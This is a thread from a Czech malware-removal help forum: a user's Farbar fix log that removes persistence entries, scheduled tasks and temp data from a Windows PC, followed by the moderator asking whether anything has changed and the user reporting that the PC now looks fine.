C:\Users\IRENA-PC\Downloads\Mall rádio.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\PA2018040002.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Plná moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\priloha1.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\readme.txt => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Spořitelna.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Telegram Desktop => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Ulozto => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\wordpress => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\__MACOSX => ":com.dropbox.attrs" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Value" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Microsoft Software Essentials" => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"C:\WINDOWS\AutoKMS" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
=========== EmptyTemp: ==========
BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 221777092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 209262 B
Edge => 33792 B
Chrome => 166347126 B
Brave => 322395 B
Firefox => 10614505 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 34550 B
IRENA-PC => 7177522 B
RecycleBin => 0 B
EmptyTemp: => 398 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 20:16:47 ====
-
Rudy
- Site Admin
- Příspěvky: 118371
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu
Smazáno. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu
PC vypadá v pořádku. Moc děkuji za pomoc a za váš čas 
Přispějete na provoz fóra?